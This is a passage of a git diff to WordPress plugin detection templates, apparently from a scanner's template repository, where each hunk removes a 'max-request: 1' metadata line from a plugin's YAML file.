https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index a038adac53..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 